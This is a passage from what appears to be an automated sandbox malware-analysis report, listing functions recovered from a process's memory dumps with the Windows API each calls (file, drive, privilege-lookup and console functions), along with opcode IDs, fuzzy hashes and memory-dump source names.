                                                    • Opcode Fuzzy Hash: 33847fa5370703b2a26dd30d210ba2cfab6c880d41eca8e4fac751d96d3d5b5b
                                                    • Instruction Fuzzy Hash: 11218E7550D3C49FDB12CB25DC55B92BFB4AF13214F0C84EAE988CF693D2689408C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: e68e8cc06a68e151335c29eb31edb9dc6daef7b0c2e5f16d5f29bcd2621be5b5
                                                    • Instruction ID: feb3729762857eb22fe101ed60be9150ea09ec8a4b29aeacb732cf766c5cf49a
                                                    • Opcode Fuzzy Hash: e68e8cc06a68e151335c29eb31edb9dc6daef7b0c2e5f16d5f29bcd2621be5b5
                                                    • Instruction Fuzzy Hash: 842192765083809FDB21CF25DC45B96FFB4EF06220F08849AED898B562D235A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 54e3e5e583fce4fe2ef8cabe17ce3e9a1fb4de8c798b90824221139e9fddf0be
                                                    • Instruction ID: 9ff70e7ea598cc090b08d37397384bed710141c23b5a2ada9082bc65127bf1a2
                                                    • Opcode Fuzzy Hash: 54e3e5e583fce4fe2ef8cabe17ce3e9a1fb4de8c798b90824221139e9fddf0be
                                                    • Instruction Fuzzy Hash: 3511B1B1600300EFEB21CF55DC85FAAFBA8EF04720F04846AED05CB241D670E9048B71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 81ca990ee887229b8fbe0d08385245db7b08d885e91e412f99626d1b9a5499d6
                                                    • Instruction ID: 16ff29dfe2c25a1d0d2df33392feafd1164820ad6836fb33b98027af62397983
                                                    • Opcode Fuzzy Hash: 81ca990ee887229b8fbe0d08385245db7b08d885e91e412f99626d1b9a5499d6
                                                    • Instruction Fuzzy Hash: 5021A2716053819FE722CF29DC44B52BFE8EF06214F0884AAED49CB653D265E804CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 71a2ba73f8efc5ace32f2e54c7f338a808c441450f777e4cb0efda2c1bdc2b15
                                                    • Instruction ID: 451187883701c42078062232919246ca7abf29a05bff4eada55d67c206608737
                                                    • Opcode Fuzzy Hash: 71a2ba73f8efc5ace32f2e54c7f338a808c441450f777e4cb0efda2c1bdc2b15
                                                    • Instruction Fuzzy Hash: 7F219F725093C09FEB128B25DC55B92BFA4EF07220F0984DAED858F263D234A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 01dfc8db8849cdc3f629866a3af837292bfb4f99c38ad1199fcf0d9bd8d1807c
                                                    • Instruction ID: 53706196d1df3c1ec2bcb6c693993267b1364e34937ff2a352321a1bb26fa175
                                                    • Opcode Fuzzy Hash: 01dfc8db8849cdc3f629866a3af837292bfb4f99c38ad1199fcf0d9bd8d1807c
                                                    • Instruction Fuzzy Hash: B8216D6540D3C49FD7138B25DC54A62BFB4EF57620F0D80DBD8898F2A3D6696808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: c769d28c50e0e673f1f489a2d731da50badc287cf6b89d619357aabd72859484
                                                    • Instruction ID: be12781fb99a9eead4ed1864c0cce2bbf117be3da5e45d188c01860ed4c4b18e
                                                    • Opcode Fuzzy Hash: c769d28c50e0e673f1f489a2d731da50badc287cf6b89d619357aabd72859484
                                                    • Instruction Fuzzy Hash: ED11B271500300EFEB22DF55DC45BAAFBA8EF44724F14846AE9059B281D670E904CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 028408E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: ad2ca0d3682d5fe8c335e5deaafa63c7dfd4c60b60f56dff5e6070f358be97fe
                                                    • Instruction ID: 06cc89182cc7c757bba4357a5024309d05e1aa6a05c5c0d2c5a3e0268f8d3471
                                                    • Opcode Fuzzy Hash: ad2ca0d3682d5fe8c335e5deaafa63c7dfd4c60b60f56dff5e6070f358be97fe
                                                    • Instruction Fuzzy Hash: 8811C176400308EFFB21DF51DC45FA7FBA8EF54721F14895AEE499A241C671A504CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c949e444ca883306007ba8cf054e246eaacd74459d037983b76495c51306f618
                                                    • Instruction ID: 6f3a1c111ba5258456cad4631da6bdb395ce9d42f3699894071b7ec179da7516
                                                    • Opcode Fuzzy Hash: c949e444ca883306007ba8cf054e246eaacd74459d037983b76495c51306f618
                                                    • Instruction Fuzzy Hash: F1117F72508384AFDB22CF65DC45B92FFF4EF05210F08849EE9898B662D375E918DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028412D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 35cbb87d2ff7b9f2373456a8fc7616eed34d80d71ea65819142a77b37d4b95d1
                                                    • Instruction ID: 8f407f40a62c809bc0a8103620b6a1bc709202b1f1911711c9108322b2e0c87b
                                                    • Opcode Fuzzy Hash: 35cbb87d2ff7b9f2373456a8fc7616eed34d80d71ea65819142a77b37d4b95d1
                                                    • Instruction Fuzzy Hash: A711C4755083849FDB218F15DC49B96FFA4EF06220F0884EEED498B252D235A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: db6d20e588ecb3ad6f387ce36386ec41a2ef922bd8d0d894b66eab78d235103b
                                                    • Instruction ID: 84d08240fea7079db58bc7635eba1a60f7faceb1426dfb497867091d945fd02a
                                                    • Opcode Fuzzy Hash: db6d20e588ecb3ad6f387ce36386ec41a2ef922bd8d0d894b66eab78d235103b
                                                    • Instruction Fuzzy Hash: 45114F715093C49FE7128F15DC54AA2FFB4DF47614F0880DAEDC58F263D265A908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028405E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: ad5804a99255f555cbcb32953d59ccdd5a976d1a30d051afd70a41a63f685709
                                                    • Instruction ID: 3914ddbc4c97fbb67fb1ee3dc573fdbd5ce59fc732f4f4c1689576bb84473fe2
                                                    • Opcode Fuzzy Hash: ad5804a99255f555cbcb32953d59ccdd5a976d1a30d051afd70a41a63f685709
                                                    • Instruction Fuzzy Hash: 4A11C2755093C49FDB128B15DC95B52FFB4DF42220F0880EBED898B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 18c8d661cbe39ca95f79d2190320158f25d69c72753ccded40d3d971fb4ca3e6
                                                    • Instruction ID: 9d72d2523cca19f77a6c81fbcb07d70529ac66221536caeb680d9505a2d9d66f
                                                    • Opcode Fuzzy Hash: 18c8d661cbe39ca95f79d2190320158f25d69c72753ccded40d3d971fb4ca3e6
                                                    • Instruction Fuzzy Hash: 8D119D754093C49FE7228B25DC55B92BFB4EF07324F0980DAD9888B263C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: a0ec274661120f8e31a7ea70e1c1053d6b6b606a5cea26406d780f290b6624af
                                                    • Instruction ID: be7f51531ba9223535ea71966c44677ccbf7f09a18f26872af41f6c61f279902
                                                    • Opcode Fuzzy Hash: a0ec274661120f8e31a7ea70e1c1053d6b6b606a5cea26406d780f290b6624af
                                                    • Instruction Fuzzy Hash: FF115EB1600301DFEB21DF2AEC85B96FBD8EB04625F48846AED09CB642D675E504CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 29d5da401ae9a0070e0aee3bc0dc4dbec4089025f5fb4b953f5a92305680a46d
                                                    • Instruction ID: d09b3dc99b293e2b1ddbf7ebce29ec140d0a580c98a63b82c0f5ca70bf99b808
                                                    • Opcode Fuzzy Hash: 29d5da401ae9a0070e0aee3bc0dc4dbec4089025f5fb4b953f5a92305680a46d
                                                    • Instruction Fuzzy Hash: 8611917540D7C09FD7138B15DC85A91BFA4EF03224F0980DBDD858F263D269A909DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028407C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 02840819
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 3ea69c8d3151fb08187635065cfee7c3379754e25804d00549a939bb5fc4b467
                                                    • Instruction ID: 42512669ded377ae243b6ba2fdbba5305785204a91eca2d280638fdb7782b7d3
                                                    • Opcode Fuzzy Hash: 3ea69c8d3151fb08187635065cfee7c3379754e25804d00549a939bb5fc4b467
                                                    • Instruction Fuzzy Hash: C5018079500708EFFB209F15DD85FA7FB98DF44721F14809AEE099A241DA74A904CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028413AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 9bdeae1b1fadaab94ddde355835ee7c2388fd6e7152b75688aa6617e97d27bd1
                                                    • Instruction ID: 0c95fba840738b50c0d64ba874be32e7080a1058489d66131b9173f52707b897
                                                    • Opcode Fuzzy Hash: 9bdeae1b1fadaab94ddde355835ee7c2388fd6e7152b75688aa6617e97d27bd1
                                                    • Instruction Fuzzy Hash: 2211CB7A600704DFEB20CF56DC88B66FBA4EF04620F08C4AAEC09CB612D735E448CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 76fca95adce143ae1eb8c2ce28301a418b62662f8e9c597a382784d52f4e3d47
                                                    • Instruction ID: a43a78761ea8ad2e9a1eb6837dbb0e8d2df0783bdb7a1317c00d151e07cadd8c
                                                    • Opcode Fuzzy Hash: 76fca95adce143ae1eb8c2ce28301a418b62662f8e9c597a382784d52f4e3d47
                                                    • Instruction Fuzzy Hash: 771182B55093809FDB12CF55EC85B92BFA4EF42324F0984ABDD498F253D275A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 86262a70d52fa425b4fa26272b855d1294e34fc2439024502fac14ca40a81cbf
                                                    • Instruction ID: 20b35b2177319dad71602fa7f03fc28dadddae853c0f638c5cf39723a086ad1b
                                                    • Opcode Fuzzy Hash: 86262a70d52fa425b4fa26272b855d1294e34fc2439024502fac14ca40a81cbf
                                                    • Instruction Fuzzy Hash: A511A172500700DFEB22CF95DC45B52FFE4EF04715F0884AAED498A612D371E914DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 1f1148c1bfde8212320c7d6c12617e01f6a834c6e90d6e155cb958219f0c1b11
                                                    • Instruction ID: 356ec6559ffe273685cf05dab8e17a339aa1b2bea60f9eeb3c231756508eb1af
                                                    • Opcode Fuzzy Hash: 1f1148c1bfde8212320c7d6c12617e01f6a834c6e90d6e155cb958219f0c1b11
                                                    • Instruction Fuzzy Hash: 3F019E796043488FEB14DF65DC857A6FBA8DB00625F0884AADE09CB642DB74E404CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: d83d522cd2271faf8fb60147c0228862b28e616ab12b056b6a11d72d60e098fb
                                                    • Instruction ID: a9d6c77f6538646fe3644de3e0984c47611c010c34b5e71f01a728d8aa74af73
                                                    • Opcode Fuzzy Hash: d83d522cd2271faf8fb60147c0228862b28e616ab12b056b6a11d72d60e098fb
                                                    • Instruction Fuzzy Hash: 09017171900600ABE310DF16DD46B66FBA8FB84B20F14816AED089B741D235B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 972401c87372eb1aa523e1858470c365b1cb420ce49dcb7a10567ed0fa7f24e2
                                                    • Instruction ID: 3805e7be2feb26aeb33f6a0fff12f1b8fda471671b29c1904152a67c9f58d8b2
                                                    • Opcode Fuzzy Hash: 972401c87372eb1aa523e1858470c365b1cb420ce49dcb7a10567ed0fa7f24e2
                                                    • Instruction Fuzzy Hash: EC018471900700AFE310DF16DD46B66FBA8FB84B20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028412FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: f1e869e3c4725677c0a03e683ae68d25717a9a62050405f4858cc447107b4fe4
                                                    • Instruction ID: ebcd9310a221276256d4324b816b1de4012e07787980218a4623d34619b9a60b
                                                    • Opcode Fuzzy Hash: f1e869e3c4725677c0a03e683ae68d25717a9a62050405f4858cc447107b4fe4
                                                    • Instruction Fuzzy Hash: 8201BC79504304DFEF209F15DC89BAAFBA4EF04624F08C4AAEC09CB652D679A444CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CABAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: d7a56b0cae1c6659c41e900cc33c13f792e05e5742d8f63a0add04827ba4125a
                                                    • Instruction ID: c7f20feecf547e24df6a991403dd4deca59ad9784b968095b111dab3e13e50fb
                                                    • Opcode Fuzzy Hash: d7a56b0cae1c6659c41e900cc33c13f792e05e5742d8f63a0add04827ba4125a
                                                    • Instruction Fuzzy Hash: 5501F271500301DFEB22CF19EC85BA6FFA4EF04624F48C4ABDD098B656D275E904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028404B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 24ea617c2b5afb539667e6b2cd4f8a8f5b3865c5dd3988a1b84d6625d5b991b0
                                                    • Instruction ID: bb4539c61a021e45cebf4eb63b5cd1edc5194195a63b187017a238627fc8aa43
                                                    • Opcode Fuzzy Hash: 24ea617c2b5afb539667e6b2cd4f8a8f5b3865c5dd3988a1b84d6625d5b991b0
                                                    • Instruction Fuzzy Hash: B2016D71900600ABE324DF16DD86B26FBA8FB88B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02840F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: eff1cda798b9c5822fa313910bf22a0aa85d76cd5d4994868b1f43bf29699d24
                                                    • Instruction ID: 6338ddd58f700d6224ba2c8128682f076292ffc9558dac91ba08ccd81dd8112a
                                                    • Opcode Fuzzy Hash: eff1cda798b9c5822fa313910bf22a0aa85d76cd5d4994868b1f43bf29699d24
                                                    • Instruction Fuzzy Hash: 42018F79504348DFEB20DF55D885B66FB94EF00624F08C5AADD08CF686D778E504CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: cb9b605143a9fa9c60341a5b38179af1ecec3b61f4586514376e8db1fcfec9e3
                                                    • Instruction ID: a6858307a48972be03b65dc5ac762546f67086e347b02212bde604dcc32f324e
                                                    • Opcode Fuzzy Hash: cb9b605143a9fa9c60341a5b38179af1ecec3b61f4586514376e8db1fcfec9e3
                                                    • Instruction Fuzzy Hash: F4016D71900600ABE324DF16DD86B26FBA8FB88B20F14825AED085B741D275F915CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 412611657c04872494a309e252f7e4585bc5a111aa37c742b4203cf1cb28f448
                                                    • Instruction ID: b930786e4bbb7300b10f00903313dc6e73662cea0ee301b5915cdab2e1d4a593
                                                    • Opcode Fuzzy Hash: 412611657c04872494a309e252f7e4585bc5a111aa37c742b4203cf1cb28f448
                                                    • Instruction Fuzzy Hash: D201F479500708CFEB248F15D885766FBA0DF41724F08C0AADD0A8B753D774E404DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01CAAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: af3002be1ef987fff330764b3270a1ab51c1b3256ee439cd6eb21cb3a16a4b16
                                                    • Instruction ID: d0763b3bf3e31941c8223dd48a493c010679f2ee546af4d18c64e6e03760d894
                                                    • Opcode Fuzzy Hash: af3002be1ef987fff330764b3270a1ab51c1b3256ee439cd6eb21cb3a16a4b16
                                                    • Instruction Fuzzy Hash: 5E01F431404340DFEB11DF5AEC85795FBA4DF04624F48C4ABDD098F642D275E504CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02841116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: e60b772f4e300c7a358cf51dd74527961c27390362621bd6150773584e401f89
                                                    • Instruction ID: 43c676a7101549def851bcfa67f1e97add8f069942c6ec38de30a192c236aaec
                                                    • Opcode Fuzzy Hash: e60b772f4e300c7a358cf51dd74527961c27390362621bd6150773584e401f89
                                                    • Instruction Fuzzy Hash: D6F0FF38500748DFEB20CF05D889766FBA0EF00A21F08C09ADC0D8B312CA75A484CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0284096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 83a485ff38295047d939051d06738713f97737eb9bdaad739882da4b42065593
                                                    • Instruction ID: dc4adcc30de31cc8c142089f90f3779774c9436bf55d7a708896cba45f70eeb9
